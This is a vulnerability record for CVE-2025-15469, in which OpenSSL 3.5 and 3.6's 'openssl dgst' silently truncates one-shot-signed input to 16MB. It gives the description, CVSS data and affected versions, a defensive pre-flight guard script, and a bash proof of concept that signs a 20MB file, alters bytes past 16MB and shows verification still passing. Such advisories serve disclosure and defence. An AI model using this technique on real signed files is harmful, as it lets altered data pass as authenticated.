Security Vulnerability Report
CVE-2025-15469 CVSS 5.5 MEDIUM

Published: 2026-01-27 16:16:15
Last Modified: 2026-02-02 18:37:39

Description

Issue summary: The 'openssl dgst' command-line tool silently truncates input data to 16MB when using one-shot signing algorithms and reports success instead of an error.

Impact summary: A user signing or verifying files larger than 16MB with one-shot algorithms (such as Ed25519, Ed448, or ML-DSA) may believe the entire file is authenticated while trailing data beyond 16MB remains unauthenticated.

When the 'openssl dgst' command is used with algorithms that only support one-shot signing (Ed25519, Ed448, ML-DSA-44, ML-DSA-65, ML-DSA-87), the input is buffered with a 16MB limit. If the input exceeds this limit, the tool silently truncates to the first 16MB and continues without signaling an error, contrary to what the documentation states. This creates an integrity gap where trailing bytes can be modified without detection if both signing and verification are performed using the same affected codepath.

The issue affects only the command-line tool behavior. Verifiers that process the full message using library APIs will reject the signature, so the risk primarily affects workflows that both sign and verify with the affected 'openssl dgst' command. Streaming digest algorithms for 'openssl dgst' and library users are unaffected.

The FIPS modules in 3.5 and 3.6 are not affected by this issue, as the command-line tools are outside the OpenSSL FIPS module boundary.

OpenSSL 3.5 and 3.6 are vulnerable to this issue.

OpenSSL 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are not affected by this issue.
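A pre-flight guard for signing or verification scripts that call 'openssl dgst' with one-shot keys, refusing inputs the affected tool would truncate. This is an added example, not part of the original record or OpenSSL's own code: the function names are hypothetical, "16MB" is assumed to mean 16 MiB, and the version ranges are the ones in this record's configuration data.

```sh
#!/bin/sh
# Added example: pre-flight guard for 'openssl dgst' with one-shot keys
# (Ed25519, Ed448, ML-DSA). Not OpenSSL code; function names are hypothetical.

# Assumption: the record's "16MB" buffer limit means 16 MiB.
ONESHOT_LIMIT=$((16 * 1024 * 1024))

# Succeeds if version $1 is in a range this record lists as vulnerable:
# 3.5.0 <= v < 3.5.5 or 3.6.0 <= v < 3.6.1.
is_affected_version() {
    av_major=${1%%.*}
    av_rest=${1#*.}
    av_minor=${av_rest%%.*}
    case "$av_rest" in
        *.*) av_patch=${av_rest#*.} ;;
        *)   av_patch=0 ;;
    esac
    av_patch=${av_patch%%[!0-9]*}      # drop suffixes such as "-dev"
    [ "$av_major" = 3 ] || return 1
    case "$av_minor" in
        5) [ "${av_patch:-0}" -lt 5 ] ;;
        6) [ "${av_patch:-0}" -lt 1 ] ;;
        *) return 1 ;;
    esac
}

# check_oneshot_input FILE [VERSION]
# Returns 0 if FILE can be passed to 'openssl dgst' without truncation,
# 1 if the tool would silently drop trailing bytes, 2 if FILE is unreadable.
check_oneshot_input() {
    ci_file=$1
    ci_version=${2:-$(openssl version | awk '{print $2}')}
    [ -r "$ci_file" ] || { echo "cannot read $ci_file" >&2; return 2; }
    ci_size=$(( $(wc -c < "$ci_file") ))
    if is_affected_version "$ci_version" && [ "$ci_size" -gt "$ONESHOT_LIMIT" ]; then
        echo "REFUSE: $ci_file is $ci_size bytes; openssl $ci_version dgst" \
             "authenticates only the first $ONESHOT_LIMIT" >&2
        return 1
    fi
    return 0
}

# Command-line use: guard.sh FILE [VERSION]
if [ "$#" -ge 1 ]; then
    check_oneshot_input "$@"
fi
```

The guard is only meaningful for the one-shot algorithms named above; streaming digest algorithms are unaffected and need no size check.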

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* (from 3.5.0 up to, excluding, 3.5.5) - VULNERABLE
cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* (from 3.6.0 up to, excluding, 3.6.1) - VULNERABLE
OpenSSL 3.5.x before 3.5.5 (affected)
OpenSSL 3.6.x before 3.6.1 (affected)
OpenSSL 3.4.x (not affected)
OpenSSL 3.3.x (not affected)
OpenSSL 3.0.x (not affected)
OpenSSL 1.1.1 (not affected)
OpenSSL 1.0.2 (not affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-15469 PoC - OpenSSL dgst 16MB Input Truncation
# This PoC demonstrates that files larger than 16MB can be modified
# without detection when signed and verified with affected openssl dgst

# Create a test file larger than 16MB
dd if=/dev/urandom of=test_file.bin bs=1M count=20 2>/dev/null

# Generate Ed25519 keypair
openssl genpkey -algorithm Ed25519 -out private_key.pem 2>/dev/null
openssl pkey -in private_key.pem -pubout -out public_key.pem 2>/dev/null

# Sign the file (openssl dgst will silently truncate to 16MB)
# No digest option is passed: Ed25519 is a one-shot algorithm and does not accept an explicit digest
echo "Signing file with Ed25519 (file is 20MB, will be truncated to 16MB)..."
openssl dgst -sign private_key.pem -out signature.bin test_file.bin

# Modify the file beyond 16MB boundary
# With bs=1, seek counts bytes, so the offset is given as 17 MiB in bytes
echo "Modifying data beyond 16MB boundary..."
echo "MODIFIED_DATA" | dd of=test_file.bin bs=1 seek=$((17 * 1024 * 1024)) conv=notrunc 2>/dev/null

# Verify signature (will incorrectly report success)
echo "Verifying modified file..."
openssl dgst -verify public_key.pem -signature signature.bin test_file.bin

# Cleanup
rm -f test_file.bin private_key.pem public_key.pem signature.bin

echo ""
echo "Expected behavior: Verification should FAIL but may show SUCCESS due to truncation vulnerability"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15469", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:14.523", "lastModified": "2026-02-02T18:37:39.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Issue summary: The 'openssl dgst' command-line tool silently truncates input\ndata to 16MB when using one-shot signing algorithms and reports success instead\nof an error.\n\nImpact summary: A user signing or verifying files larger than 16MB with\none-shot algorithms (such as Ed25519, Ed448, or ML-DSA) may believe the entire\nfile is authenticated while trailing data beyond 16MB remains unauthenticated.\n\nWhen the 'openssl dgst' command is used with algorithms that only support\none-shot signing (Ed25519, Ed448, ML-DSA-44, ML-DSA-65, ML-DSA-87), the input\nis buffered with a 16MB limit. If the input exceeds this limit, the tool\nsilently truncates to the first 16MB and continues without signaling an error,\ncontrary to what the documentation states. This creates an integrity gap where\ntrailing bytes can be modified without detection if both signing and\nverification are performed using the same affected codepath.\n\nThe issue affects only the command-line tool behavior. Verifiers that process\nthe full message using library APIs will reject the signature, so the risk\nprimarily affects workflows that both sign and verify with the affected\n'openssl dgst' command. 
Streaming digest algorithms for 'openssl dgst' and\nlibrary users are unaffected.\n\nThe FIPS modules in 3.5 and 3.6 are not affected by this issue, as the\ncommand-line tools are outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.5 and 3.6 are vulnerable to this issue.\n\nOpenSSL 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are not affected by this issue."}, {"lang": "es", "value": "Resumen del problema: La herramienta de línea de comandos 'openssl dgst' trunca silenciosamente los datos de entrada a 16MB cuando se utilizan algoritmos de firma de un solo paso e informa éxito en lugar de un error.\n\nResumen del impacto: Un usuario que firma o verifica archivos de más de 16MB con algoritmos de un solo paso (como Ed25519, Ed448 o ML-DSA) puede creer que el archivo completo está autenticado mientras que los datos finales más allá de 16MB permanecen sin autenticar.\n\nCuando se utiliza el comando 'openssl dgst' con algoritmos que solo admiten la firma de un solo paso (Ed25519, Ed448, ML-DSA-44, ML-DSA-65, ML-DSA-87), la entrada se almacena en búfer con un límite de 16MB. Si la entrada excede este límite, la herramienta trunca silenciosamente a los primeros 16MB y continúa sin señalar un error, contrario a lo que establece la documentación. Esto crea una brecha de integridad donde los bytes finales pueden modificarse sin detección si tanto la firma como la verificación se realizan utilizando la misma ruta de código afectada.\n\nEl problema afecta solo el comportamiento de la herramienta de línea de comandos. Los verificadores que procesan el mensaje completo utilizando las API de la librería rechazarán la firma, por lo que el riesgo afecta principalmente a los flujos de trabajo que tanto firman como verifican con el comando 'openssl dgst' afectado. 
Los algoritmos de resumen por streaming para 'openssl dgst' y los usuarios de la librería no se ven afectados.\n\nLos módulos FIPS en 3.5 y 3.6 no se ven afectados por este problema, ya que las herramientas de línea de comandos están fuera del límite del módulo FIPS de OpenSSL.\n\nOpenSSL 3.5 y 3.6 son vulnerables a este problema.\n\nOpenSSL 3.4, 3.3, 3.0, 1.1.1 y 1.0.2 no se ven afectados por este problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.5", "matchCriteriaId": "1CAC7CBE-EC03-4089-938A-0CEEB2E09B62"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0", "versionEndExcluding": "3.6.1", "matchCriteriaId": "68352537-5E99-4F4D-B78A-BCF0353A70A5"}]}]}], "references": [{"url": "https://github.com/openssl/openssl/commit/310f305eb92ea8040d6b3cb75a5feeba8e6acf2f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/a7936fa4bd23c906e1955a16 ... (truncated)